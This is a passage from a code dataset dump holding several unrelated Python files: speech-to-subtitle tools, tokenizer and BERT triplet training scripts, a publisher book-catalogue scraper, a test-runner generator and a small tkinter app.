397\nmenu_choose_scenes_715 = 398\n","sub_path":"ID files/ID_menus.py","file_name":"ID_menus.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"485616281","text":"import sys\nimport os\nimport os.path\nfrom encode_manager import File\n\nclass Runtime:\n\n def __init__(self):\n\n self.dir_path = os.path.dirname(os.path.realpath(__file__))\n\n def run(self):\n \n answer = input(\"What File would you like to work with? \\n Enter the complete path from root --> \")\n\n check = input(f\"are you sure that \\\"{answer}\\\" is the desired path? [y/n] \")\n\n if check == \"n\":\n pass\n #restart\n\n elif check != \"y\":\n print(\"Please enter a known response, goodbye.....\")\n #restart\n\n else:\n if os.path.isfile(answer) is False:\n \n raise ValueError(\"Requested file does not exist....\")\n \n self.file_session = File(answer)\n \n\n while True:\n \n req_action = input(\"what would you like to do? 
[encode, read, exit] \")\n \n if req_action == \"encode\":\n self.file_session.encode()\n break\n\n if req_action == \"read\":\n self.file_session.pprint()\n break\n\n if req_action == \"exit\":\n sys.exit()\n \n else:\n print(\"Unknown request, please try again (exact wording is important)\")","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"371364619","text":"import os\nimport tokenizers\nimport json\n\ndef train_tokenizer():\n filepath_vocab = './data/pretrain_wo_aug.txt'\n bwpt = tokenizers.BertWordPieceTokenizer(vocab=None)\n bwpt.train(\n files=[filepath_vocab],\n min_frequency=2,\n limit_alphabet=1000,\n )\n bwpt.save('./data/vocab.json')\n\ndef save_vocab(json_path, vocab_path):\n with open(json_path, 'r') as load_f:\n load_dict = json.load(load_f)\n \n with open(vocab_path, 'w', encoding='utf-8') as writer:\n for vocab in load_dict['model']['vocab']:\n writer.write(vocab + '\\n')\n print('save successfully!')\n\nif __name__ == '__main__':\n train_tokenizer()\n json_path = './data/vocab.json'\n vocab_path = './data/vocab.txt'\n save_vocab(json_path, vocab_path)","sub_path":"project_submit/build_vocab.py","file_name":"build_vocab.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"216216459","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport wave\nimport shutil\nimport argparse\nimport subprocess\nimport numpy as np\nfrom tqdm import tqdm\nfrom deepspeech import Model, version\nfrom segmentAudio import silenceRemoval\nfrom audioProcessing import extract_audio, convert_samplerate\nfrom writeToFile import write_to_file\n\n# Line count for SRT file\nline_count = 0\n\ndef sort_alphanumeric(data):\n \"\"\"Sort function to sort os.listdir() alphanumerically\n Helps to process audio files sequentially after splitting\n\n Args:\n data : file name\n \"\"\"\n\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n\n return sorted(data, key = alphanum_key)\n\n\ndef ds_process_audio(ds, audio_file, file_handle, vtt, split_duration):\n \"\"\"Run DeepSpeech inference on each audio file generated after silenceRemoval\n and write to file pointed by file_handle\n\n Args:\n ds : DeepSpeech Model\n audio_file : audio file\n file_handle : file handle\n vtt: Is Video Text Tracks format\n split_duration: for long audio segments, split the subtitle based on this number of seconds\n \"\"\"\n\n global line_count\n fin = wave.open(audio_file, 'rb')\n fs_orig = fin.getframerate()\n desired_sample_rate = ds.sampleRate()\n\n # Check if sampling rate is required rate (16000)\n # won't be carried out as FFmpeg already converts to 16kHz\n if fs_orig != desired_sample_rate:\n print(\"Warning: original sample rate ({}) is different than {}hz. Resampling might \\\n produce erratic speech recognition\".format(fs_orig, desired_sample_rate), file=sys.stderr)\n audio = convert_samplerate(audio_file, desired_sample_rate)\n else:\n audio = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n\n fin.close()\n\n # Perform inference on audio segment\n metadata = ds.sttWithMetadata(audio)\n\n # File name contains start and end times in seconds. 
Extract that\n limits = audio_file.split(os.sep)[-1][:-4].split(\"_\")[-1].split(\"-\")\n\n # Run-on sentences are inferred as a single block, so write the sentence out as multiple separate lines\n # based on a user-provided split duration.\n current_token_index = 0\n split_start_index = 0\n previous_end_time = 0\n # timestamps of word boundaries\n cues = [float(limits[0])]\n num_tokens = len(metadata.transcripts[0].tokens)\n # Walk over each character in the current audio segment's inferred text\n while current_token_index < num_tokens:\n token = metadata.transcripts[0].tokens[current_token_index]\n # If at a word boundary, get the timestamp for VTT cue data\n if token.text == \" \":\n cues += [float(limits[0]) + token.start_time]\n # time duration is exceeded and at the next word boundary\n needs_split = ((token.start_time - previous_end_time) > split_duration) and token.text == \" \"\n is_final_character = current_token_index+1 == num_tokens\n # Write out the line\n if needs_split or is_final_character:\n # Determine the timestamps\n split_limits = [float(limits[0]) + previous_end_time, float(limits[0]) + token.start_time]\n # Convert character list to string. Upper bound has plus 1 as python list slices are [inclusive, exclusive]\n split_inferred_text = ''.join([x.text for x in metadata.transcripts[0].tokens[split_start_index:current_token_index+1]])\n write_to_file(file_handle, split_inferred_text, line_count, split_limits, vtt, cues)\n # Reset and update indexes for the next subtitle split\n previous_end_time = token.start_time\n split_start_index = current_token_index + 1\n cues = [float(limits[0])]\n line_count += 1\n current_token_index += 1\n\n\ndef main():\n global line_count\n print(\"AutoSub\\n\")\n\n parser = argparse.ArgumentParser(description=\"AutoSub\")\n parser.add_argument('--file', required=True,\n help='Input video file')\n parser.add_argument('--vtt', dest=\"vtt\", action=\"store_true\",\n help='Output a vtt file with cue points for individual words instead of an srt file')\n parser.add_argument('--split-duration', type=float, help='Split run-on sentences exceeding this duration (in seconds) into multiple subtitles', default=5)\n args = parser.parse_args()\n\n for x in os.listdir():\n if x.endswith(\".pbmm\"):\n print(\"Model: \", os.path.join(os.getcwd(), x))\n ds_model = os.path.join(os.getcwd(), x)\n if x.endswith(\".scorer\"):\n print(\"Scorer: \", os.path.join(os.getcwd(), x))\n ds_scorer = os.path.join(os.getcwd(), x)\n\n # Load DeepSpeech model\n try:\n ds = Model(ds_model)\n except:\n print(\"Invalid model file. Exiting\\n\")\n sys.exit(1)\n\n try:\n ds.enableExternalScorer(ds_scorer)\n except:\n print(\"Invalid scorer file. 
Running inference using only model file\\n\")\n\n if os.path.isfile(args.file):\n input_file = args.file\n print(\"\\nInput file:\", input_file)\n else:\n print(args.file, \": No such file exists\")\n sys.exit(1)\n\n base_directory = os.getcwd()\n output_directory = os.path.join(base_directory, \"output\")\n audio_directory = os.path.join(base_directory, \"audio\")\n video_file_name = input_file.split(os.sep)[-1].split(\".\")[0]\n audio_file_name = os.path.join(audio_directory, video_file_name + \".wav\")\n srt_extension = \".srt\" if not args.vtt else \".vtt\"\n srt_file_name = os.path.join(output_directory, video_file_name + srt_extension)\n\n # Clean audio/ directory\n shutil.rmtree(audio_directory)\n os.mkdir(audio_directory)\n\n # Extract audio from input video file\n extract_audio(input_file, audio_file_name)\n\n print(\"Splitting on silent parts in audio file\")\n silenceRemoval(audio_file_name)\n\n # Output SRT or VTT file\n file_handle = open(srt_file_name, \"a+\")\n file_handle.seek(0)\n\n if args.vtt:\n file_handle.write(\"WEBVTT\\n\")\n file_handle.write(\"Kind: captions\\n\\n\")\n\n print(\"\\nRunning inference:\")\n\n for file in tqdm(sort_alphanumeric(os.listdir(audio_directory))):\n audio_segment_path = os.path.join(audio_directory, file)\n\n # Dont run inference on the original audio file\n if audio_segment_path.split(os.sep)[-1] != audio_file_name.split(os.sep)[-1]:\n ds_process_audio(ds, audio_segment_path, file_handle, args.vtt, split_duration=args.split_duration)\n\n if not args.vtt:\n print(\"\\nSRT file saved to\", srt_file_name)\n else:\n print(\"\\nVTT file saved to\", srt_file_name)\n\n file_handle.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"autosub/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81301681","text":"import time\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle as pkl\r\n\r\nimport tensorflow as tf\r\nimport tf_ver2_bert_network as bert\r\n\r\n# Define the weight update step for multiple sub-batches. #\r\n#@tf.function\r\ndef sub_batch_train_step(\r\n model, sub_batch_sz, \r\n x_anchor, x_positive, x_negative, optimizer, \r\n learning_rate=1.0e-3, grad_clip=1.0, alpha=5.0):\r\n optimizer.lr.assign(learning_rate)\r\n \r\n batch_size = x_anchor.shape[0]\r\n if batch_size <= sub_batch_sz:\r\n sub_batch = 1\r\n elif batch_size % sub_batch_sz == 0:\r\n sub_batch = int(batch_size / sub_batch_sz)\r\n else:\r\n sub_batch = int(batch_size / sub_batch_sz) + 1\r\n \r\n model_params = model.trainable_variables\r\n acc_gradients = [\r\n tf.zeros_like(var) for var in model_params]\r\n \r\n tot_losses = 0.0\r\n for n_sub in range(sub_batch):\r\n id_st = n_sub*sub_batch_sz\r\n if n_sub != (sub_batch-1):\r\n id_en = (n_sub+1)*sub_batch_sz\r\n else:\r\n id_en = batch_size\r\n \r\n tmp_anchor = x_anchor[id_st:id_en, :]\r\n tmp_positive = x_positive[id_st:id_en, :]\r\n tmp_negative = x_negative[id_st:id_en, :]\r\n \r\n with tf.GradientTape() as grad_tape:\r\n embed_anc = model(\r\n tmp_anchor, training=True)[1][:, 0, :]\r\n embed_pos = model(\r\n tmp_positive, training=True)[1][:, 0, :]\r\n embed_neg = model(\r\n tmp_negative, training=True)[1][:, 0, :]\r\n \r\n # Triplet loss. 
#\r\n tmp_pos_dist = tf.reduce_mean(tf.square(\r\n embed_anc - embed_pos), axis=1)\r\n tmp_neg_dist = tf.reduce_mean(tf.square(\r\n embed_anc - embed_neg), axis=1)\r\n triplet_loss = tf.maximum(\r\n 0.0, tmp_pos_dist - tmp_neg_dist + alpha)\r\n \r\n tmp_losses = tf.reduce_sum(triplet_loss)\r\n# tmp_losses = tf.reduce_sum(tf.reduce_sum(\r\n# tf.nn.sparse_softmax_cross_entropy_with_logits(\r\n# labels=tmp_output, logits=output_logits), axis=1))\r\n \r\n # Accumulate the gradients. #\r\n tot_losses += tmp_losses\r\n tmp_gradients = grad_tape.gradient(\r\n tmp_losses, model_params)\r\n acc_gradients = [tf.add(\r\n acc_grad, grad) for acc_grad, grad \\\r\n in zip(acc_gradients, tmp_gradients)]\r\n \r\n # Update using the optimizer. #\r\n average_loss = tot_losses / batch_size\r\n acc_gradients = [tf.math.divide_no_nan(\r\n acc_grad, batch_size) for acc_grad in acc_gradients]\r\n \r\n clipped_gradients, _ = tf.clip_by_global_norm(\r\n acc_gradients, grad_clip)\r\n optimizer.apply_gradients(\r\n zip(clipped_gradients, model_params))\r\n return average_loss\r\n\r\n# Model Parameters. #\r\nbatch_size = 256\r\nsub_batch = 64\r\nseq_length = 30\r\nnum_heads = 4\r\nnum_layers = 3\r\n\r\ngradient_clip = 1.00\r\nmaximum_iter = 3000\r\nrestore_flag = True\r\nsave_step = 500\r\nwarmup_steps = 2000\r\ndisplay_step = 50\r\nanneal_step = 2500\r\nanneal_rate = 0.75\r\n\r\nprob_keep = 0.9\r\nhidden_size = 256\r\nffwd_size = 4*hidden_size\r\nwarmup_flag = True\r\ncooling_step = 500\r\n\r\nmodel_ckpt_dir = \"../../TF_Models/bert_reddit\"\r\ntrain_loss_file = \"train_loss_bert_reddit.csv\"\r\n\r\n# Load the data. #\r\ntmp_pkl_file = \\\r\n \"C:/Users/admin/Desktop/Codes/reddit_jokes.pkl\"\r\nwith open(tmp_pkl_file, \"rb\") as tmp_load_file:\r\n full_data = pkl.load(tmp_load_file)\r\n idx2word = pkl.load(tmp_load_file)\r\n word2idx = pkl.load(tmp_load_file)\r\n\r\nvocab_size = len(word2idx)\r\nprint(\"Vocabulary Size:\", str(vocab_size)+\".\")\r\n\r\ntmp_data = []\r\nfor tmp_row in full_data:\r\n if len(tmp_row.split(\" \")) > 1 and \\\r\n len(tmp_row.split(\" \")) <= seq_length:\r\n tmp_data.append(tmp_row)\r\n\r\nnum_data = len(tmp_data)\r\nSOS_token = word2idx[\"SOS\"]\r\nEOS_token = word2idx[\"EOS\"]\r\nPAD_token = word2idx[\"PAD\"]\r\nUNK_token = word2idx[\"UNK\"]\r\nprint(\"Total of\", str(len(tmp_data)), \"rows loaded.\")\r\n\r\n# Set the number of threads to use. #\r\ntf.config.threading.set_intra_op_parallelism_threads(1)\r\ntf.config.threading.set_inter_op_parallelism_threads(1)\r\n\r\n# Build the Transformer. #\r\nprint(\"Building the BERT Model.\")\r\nstart_time = time.time()\r\n\r\nbert_model = bert.BERT_Network(\r\n num_layers, num_heads, \r\n hidden_size, ffwd_size, word2idx, \r\n seq_length+2, p_keep=prob_keep)\r\nbert_optim = tf.keras.optimizers.Adam(\r\n beta_1=0.9, beta_2=0.98, epsilon=1.0e-9)\r\n\r\nelapsed_time = (time.time()-start_time) / 60\r\nprint(\"BERT Model Built\", \"(\" + str(elapsed_time) + \" mins).\")\r\n\r\n# Create the model checkpoint. 
#\r\nckpt = tf.train.Checkpoint(\r\n step=tf.Variable(0), \r\n bert_model=bert_model, \r\n bert_optim=bert_optim)\r\n\r\nmanager = tf.train.CheckpointManager(\r\n ckpt, model_ckpt_dir, max_to_keep=1)\r\n\r\nif restore_flag:\r\n ckpt.restore(manager.latest_checkpoint)\r\n if manager.latest_checkpoint:\r\n print(\"Model restored from {}\".format(\r\n manager.latest_checkpoint))\r\n else:\r\n print(\"Error: No latest checkpoint found.\")\r\n \r\n train_loss_df = pd.read_csv(train_loss_file)\r\n train_loss_list = [tuple(\r\n train_loss_df.iloc[x].values) \\\r\n for x in range(len(train_loss_df))]\r\nelse:\r\n print(\"Training a new model.\")\r\n train_loss_list = []\r\n\r\n# Train the Transformer model. #\r\ntmp_seq_anc = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\ntmp_seq_pos = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\ntmp_seq_neg = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\n\r\ntmp_test_anc = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\ntmp_test_pos = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\ntmp_test_neg = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\n\r\n# Warmup learning schedule. #\r\nn_iter = ckpt.step.numpy().astype(np.int32)\r\nif warmup_flag:\r\n step_min = float(max(n_iter, warmup_steps))**(-0.5)\r\n learning_rate = float(hidden_size)**(-0.5) * step_min\r\nelse:\r\n initial_lr = 0.001\r\n anneal_pow = int(n_iter / anneal_step)\r\n learning_rate = max(np.power(\r\n anneal_rate, anneal_pow) * initial_lr, 1.0e-5)\r\n\r\nprint(\"-\" * 50)\r\nprint(\"Training the BERT Network\", \r\n \"(\" + str(n_iter) + \" iterations).\")\r\nprint(str(num_data), \"training samples.\")\r\nprint(\"-\" * 50)\r\n\r\n# Update the neural network's weights. #\r\ntot_loss = 0.0\r\nstart_tm = time.time()\r\nwhile n_iter < maximum_iter:\r\n if warmup_flag:\r\n step_min = float(max(n_iter, warmup_steps))**(-0.5)\r\n learning_rate = float(hidden_size)**(-0.5) * step_min\r\n else:\r\n if n_iter % anneal_step == 0:\r\n anneal_pow = int(n_iter / anneal_step)\r\n learning_rate = max(np.power(\r\n anneal_rate, anneal_pow) * initial_lr, 1.0e-6)\r\n \r\n # Select a sample from the data. #\r\n batch_sample = np.random.choice(\r\n num_data, size=batch_size, replace=False)\r\n batch_add_int = np.random.randint(\r\n 1, num_data, size=batch_size)\r\n \r\n # For simplicity, take SOS to be CLS. #\r\n tmp_seq_anc[:, :] = PAD_token\r\n tmp_seq_pos[:, :] = PAD_token\r\n tmp_seq_neg[:, :] = PAD_token\r\n \r\n tmp_seq_anc[:, 0] = SOS_token\r\n tmp_seq_pos[:, 0] = SOS_token\r\n tmp_seq_neg[:, 0] = SOS_token\r\n \r\n for n_index in range(batch_size):\r\n tmp_index1 = batch_sample[n_index]\r\n tmp_index2 = \\\r\n (tmp_index1 + batch_add_int[n_index]) % num_data\r\n \r\n tmp_p_tok1 = tmp_data[tmp_index1].split(\" \")\r\n tmp_p_tok2 = tmp_data[tmp_index2].split(\" \")\r\n tmp_p_idx1 = [word2idx.get(\r\n x, UNK_token) for x in tmp_p_tok1]\r\n tmp_p_idx2 = [word2idx.get(\r\n x, UNK_token) for x in tmp_p_tok2]\r\n \r\n n_input1 = len(tmp_p_idx1) + 1\r\n n_input2 = len(tmp_p_idx2) + 1\r\n \r\n # Randomly sample the positive input #\r\n # to be used as the anchor. 
#\r\n num_sample = np.random.randint(1, n_input1-1)\r\n tmp_sample = list(sorted(list(\r\n np.random.permutation(n_input1-1)[:num_sample])))\r\n \r\n tmp_p_anc = list(\r\n np.array(tmp_p_idx1)[tmp_sample])\r\n n_anchor = len(tmp_p_anc) + 1\r\n del tmp_sample, num_sample\r\n \r\n tmp_seq_anc[n_index, 1:n_anchor] = tmp_p_anc\r\n tmp_seq_pos[n_index, 1:n_input1] = tmp_p_idx1\r\n tmp_seq_neg[n_index, 1:n_input2] = tmp_p_idx2\r\n \r\n tmp_seq_anc[n_index, n_anchor] = EOS_token\r\n tmp_seq_pos[n_index, n_input1] = EOS_token\r\n tmp_seq_neg[n_index, n_input2] = EOS_token\r\n \r\n tmp_loss = sub_batch_train_step(\r\n bert_model, sub_batch, \r\n tmp_seq_anc, tmp_seq_pos, tmp_seq_neg, \r\n bert_optim, learning_rate=learning_rate)\r\n\r\n n_iter += 1\r\n ckpt.step.assign_add(1)\r\n \r\n tot_loss += tmp_loss.numpy()\r\n if n_iter % display_step == 0:\r\n end_tm = time.time()\r\n \r\n avg_loss = tot_loss / display_step\r\n tot_loss = 0.0\r\n elapsed_tm = (end_tm - start_tm) / 60\r\n \r\n tmp_test_anc[:, :] = PAD_token\r\n tmp_test_pos[:, :] = PAD_token\r\n tmp_test_neg[:, :] = PAD_token\r\n \r\n tmp_test_anc[:, 0] = SOS_token\r\n tmp_test_pos[:, 0] = SOS_token\r\n tmp_test_neg[:, 0] = SOS_token\r\n \r\n sample_add = np.random.randint(\r\n 1, num_data, size=1)\r\n sample_pos = np.random.choice(num_data, size=1)\r\n sample_neg = (sample_pos + sample_add) % num_data\r\n \r\n tmp_in_pos = tmp_data[sample_pos[0]]\r\n tmp_in_neg = tmp_data[sample_neg[0]]\r\n \r\n tmp_p_pos = [word2idx.get(\r\n x, UNK_token) for x in tmp_in_pos.split(\" \")]\r\n tmp_p_neg = [word2idx.get(\r\n x, UNK_token) for x in tmp_in_neg.split(\" \")]\r\n \r\n n_pos_toks = len(tmp_p_pos) + 1\r\n n_neg_toks = len(tmp_p_neg) + 1\r\n num_sample = np.random.randint(1, n_pos_toks-1)\r\n tmp_sample = list(sorted(list(\r\n np.random.permutation(n_pos_toks-1)[:num_sample])))\r\n tmp_in_anc = tmp_in_pos.split(\" \")\r\n tmp_in_anc = \" \".join(\r\n [tmp_in_anc[x] for x in tmp_sample])\r\n \r\n tmp_p_anc = list(\r\n np.array(tmp_p_pos)[tmp_sample])\r\n n_anc_toks = len(tmp_p_anc) + 1\r\n del tmp_sample, num_sample\r\n \r\n tmp_test_anc[0, 1:n_anc_toks] = tmp_p_anc\r\n tmp_test_pos[0, 1:n_pos_toks] = tmp_p_pos\r\n tmp_test_neg[0, 1:n_neg_toks] = tmp_p_neg\r\n \r\n tmp_test_anc[0, n_anc_toks] = EOS_token\r\n tmp_test_pos[0, n_pos_toks] = EOS_token\r\n tmp_test_neg[0, n_neg_toks] = EOS_token\r\n \r\n tmp_anc_emb = bert_model(\r\n tmp_test_anc, training=False)[1][:, 0, :]\r\n tmp_pos_emb = bert_model(\r\n tmp_test_pos, training=False)[1][:, 0, :]\r\n tmp_neg_emb = bert_model(\r\n tmp_test_neg, training=False)[1][:, 0, :]\r\n del sample_pos, sample_neg, sample_add\r\n del n_pos_toks, n_neg_toks, n_anc_toks\r\n \r\n pos_dist = tf.reduce_mean(tf.square(\r\n tmp_anc_emb - tmp_pos_emb), axis=1)[0]\r\n neg_dist = tf.reduce_mean(tf.square(\r\n tmp_anc_emb - tmp_neg_emb), axis=1)[0]\r\n \r\n print(\"Iteration\", str(n_iter)+\".\")\r\n print(\"Elapsed Time:\", str(elapsed_tm), \"mins.\")\r\n print(\"Gradient Clip:\", str(gradient_clip) + \".\")\r\n print(\"Learning Rate:\", str(learning_rate) + \".\")\r\n print(\"Average Loss:\", str(avg_loss) + \".\")\r\n print(\"\")\r\n \r\n print(\"Anchor:\", tmp_in_anc)\r\n print(\"Positive:\", tmp_in_pos)\r\n print(\"Positive Dist:\", str(pos_dist.numpy()))\r\n print(\"Negative:\", tmp_in_neg)\r\n print(\"Negative Dist:\", str(neg_dist.numpy()))\r\n \r\n train_loss_list.append((n_iter, avg_loss))\r\n start_tm = time.time()\r\n print(\"-\" * 50)\r\n \r\n # Save the model. 
#\r\n if n_iter % save_step == 0:\r\n # Save the model. #\r\n save_path = manager.save()\r\n print(\"Saved model to {}\".format(save_path))\r\n \r\n tmp_df_losses = pd.DataFrame(\r\n train_loss_list, columns=[\"n_iter\", \"xent_loss\"])\r\n tmp_df_losses.to_csv(train_loss_file, index=False)\r\n del tmp_df_losses\r\n \r\n # Cool the GPU. #\r\n if n_iter % cooling_step == 0:\r\n print(\"Cooling GPU for 2 minutes.\")\r\n time.sleep(120)\r\n print(\"Resume Training.\")\r\n print(\"-\" * 50)\r\n\r\n","sub_path":"train_reddit_jokes_tf_ver2_bert_triplet.py","file_name":"train_reddit_jokes_tf_ver2_bert_triplet.py","file_ext":"py","file_size_in_byte":12494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165543104","text":"import requests\nimport math\n\n# 1. API for all top-level categories: https://www.ptpress.com.cn/bookinfo/getFirstParent  GET, no parameters\n\n# 2. API for the subcategories of a category: https://www.ptpress.com.cn/bookinfo/getBookTagByParentId  POST, parameters:\n# parentId: a15a734f-0ae9-41d7-9012-6ef9de2e71c8\n\n# 3. Book list API: https://www.ptpress.com.cn/bookinfo/getBookListForEBTag  POST, parameters:\n# page: 1\n# rows: 18\n# bookTagId: a15a734f-0ae9-41d7-9012-6ef9de2e71c8\n# orderStr: hot\n\n# 4. Book detail API: https://www.ptpress.com.cn/bookinfo/getBookDetailsById\n# bookId: b255ec08-2a95-4c21-b58b-432f4ebbc1fa\n\nsession = requests.session()\n\nparentCategoryUrl = \"https://www.ptpress.com.cn/bookinfo/getFirstParent\"\n\nsubCategoryUrl = \"https://www.ptpress.com.cn/bookinfo/getBookTagByParentId\"\n\nbookListUrl = \"https://www.ptpress.com.cn/bookinfo/getBookListForEBTag\"\n\nbookDetailUrl = \"https://www.ptpress.com.cn/bookinfo/getBookDetailsById\"\n\n\nresponse = session.get(url=parentCategoryUrl)\n\nif response.status_code != 200:\n raise Exception(\"The top-level category request seems to be blocked by an anti-scraping measure; please add the corresponding countermeasure!!!\")\nfor parentTag in response.json()[\"data\"]:\n print(parentTag[\"tagId\"], parentTag[\"tagName\"])\n data = {\n \"parentId\": parentTag[\"tagId\"]\n }\n response = session.post(url=subCategoryUrl, data=data)\n if response.status_code != 200:\n raise Exception(\"The subcategory request seems to be blocked by an anti-scraping measure; please add the corresponding countermeasure!!!\")\n for subTag in response.json()[\"data\"]:\n print(subTag[\"tagId\"], subTag[\"tagName\"])\n data = {\n \"page\": 1,\n \"rows\": 18,\n \"bookTagId\": subTag[\"tagId\"],\n \"orderStr\": \"hot\"\n }\n response = session.post(url=bookListUrl, data=data)\n if response.status_code != 200:\n raise Exception(\"The book list request seems to be blocked by an anti-scraping measure; please add the corresponding countermeasure!!!\")\n bookCount = int(response.json()[\"data\"][\"total\"])\n maxPage = math.ceil(bookCount / 18)\n for page in range(1, maxPage + 1):\n data[\"page\"] = page\n response = session.post(url=bookListUrl, data=data)\n print(response.json())\n\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"586229360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport sys\nimport wave\nimport io\n\nfrom deepspeech import Model\nfrom timeit import default_timer as timer\n\n\nclass SpeechRecognizer:\n def __init__(self, model):\n print('Loading model from file {}'.format(model), file=sys.stderr)\n model_load_start = timer()\n self.ds = Model(model)\n model_load_end = timer() - model_load_start\n print('Loaded model in {:.3}s.'.format(model_load_end), file=sys.stderr)\n self.desired_sample_rate = self.ds.sampleRate()\n\n def recognize(self, audio):\n result = {'error': '', 'text': '', 
'inference_length': 0, 'audio_length': 0}\n fin = wave.open(io.BytesIO(audio), 'rb')\n fs_orig = fin.getframerate()\n if fs_orig != self.desired_sample_rate:\n result['error'] = 'Error: original sample rate ({}) is different than {}hz'.format(fs_orig, self.desired_sample_rate)\n return result\n else:\n audio = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n\n audio_length = fin.getnframes() * (1 / fs_orig)\n fin.close()\n\n inference_start = timer()\n # stream = self.ds.createStream()\n # stream.\n text = self.ds.stt(audio)\n result['text'] = text\n inference_end = timer() - inference_start\n result['inference_length'] = inference_end\n result['audio_length'] = audio_length\n return result\n\n\n# a = SpeechRecognizer('deepspeech-0.7.0-models.pbmm')\n# print(a.recognize('sample5.wav'))\n# a.recognize('sample1.wav')\n","sub_path":"SpeechRecognition/DeepSpeech/speech_recognizer.py","file_name":"speech_recognizer.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"592288058","text":"#coding=utf-8\n#-------------------------------------------------------------------------------------------\n# Author: Wu Junwei   Date: January 2019\n# Purpose: JiYou Life test script generation and execution\n#--------------------------------------------------------------------------------------------\nfrom run_main import *\nfrom mobiletest.appcomm import *\nfrom common.fun_t import *\n\ndef live_run_test(getid,uname,marknum):\n Log().info(\"JiYou Life run started\")\n # initialise these up front so the final return cannot hit an unbound name\n run_sat = \"fail\"\n markval=\"live_\"+str(uname)+\"_\"+str(getid)+\"_\"+str(marknum)\n try:\n con_name,con_num,pc_type,pc_ip = getrun_db(getid)\n delpath=PATH(\"../livecase\")\n filename = 'test_sh_'+str(uname)+\"_\"+str(getid)\n del_files(delpath,filename)\n time.sleep(2)\n try:\n lgetparam,lparamcount = lparam_db(uname)\n print(\"Parameter row count: %s\"%lparamcount)\n count_sys = 0\n for i in range(lparamcount):\n try:\n filep = PATH(\"../livecase/test_sh_\")+str(uname)+\"_\"+str(getid)+\"_\"+str(i)+\".py\"\n remove_lines(PATH(\"../jy_case/jylive_temp.py\"),filep,\"#默认误删\")\n with open(filep,'r',encoding='UTF-8') as ui:\n data = ui.readlines()\n for inx,line in enumerate(data):\n if inx == 21:\n val = str(\"pc_type=\")+\"\\\"\"+str(pc_type)+\"\\\"\"+\"\\n\"+str(\"pc_ip=\")+\"\\\"\"+str(pc_ip)+\"\\\"\"+\"\\n\"+str(\"lgetparam=\")+str(lgetparam[i])+\"\\n\"+str(\"class jyliveCase_\")+str(uname)+\"_\"+str(getid)+\"_\"+str(i+1)+str(\"(unittest.TestCase):\")+\"\\n\"\n data[inx] = val\n else:\n data[inx] = line\n with open(filep,'w',encoding='UTF-8') as oi:\n oi.writelines(data)\n except Exception as e:\n print(e)\n count_sys = count_sys+i+1\n print(count_sys)\n time.sleep(2)\n all_case = add_case(caseName=\"livecase\", rule=\"test*.py\")\n run_casenew(all_case,\"result_live.html\")\n # report_path = os.path.join(cur_path, \"report\") # test case folder\n report_path1 = PATH(\"../report\")\n print(report_path1)\n report_file = get_reportfile(report_path1,'result_live.html')\n print(report_file)\n shutil.copyfile(report_file,os.path.join(cur_path, \"jylive/templates/result_live.html\"))\n if count_sys > 0:\n run_sat = \"ok\"\n else:\n run_sat = \"fail\"\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n run_sat = \"fail\"\n return run_sat,markval\n\n\n\n\n\nif __name__ == \"__main__\":\n cur_path1 = os.path.dirname(os.path.realpath(__file__))\n cur_path = os.path.abspath(os.path.dirname(os.getcwd())+os.path.sep+\".\")\n # print(cur_path1,cur_path)\n 
live_run_test()","sub_path":"jy_case/livetest.py","file_name":"livetest.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651813067","text":"import tkinter as tk\nimport numpy as np\nfrom views.Main import Main\nfrom views.Settings import Settings\n\nfrom packages.Controller import Controller\n\n\n\nclass MainView(tk.Frame):\n\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n\n self.configDict = {}\n root = args[0]\n controller = Controller(root)\n self.controller = controller\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n controller.container = container\n controller.startPage = Main(self)\n controller.settingsPage = Settings(self)\n\n controller.startPage.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n controller.settingsPage.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n\n controller.initPagesButtons()\n controller.startPage.show()\n\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n root.title('Vidan')\n root.iconbitmap('vidan2.ico')\n main = MainView(root)\n main.pack(side=\"top\", fill=\"both\", expand=True)\n root.wm_geometry(\"400x400\")\n 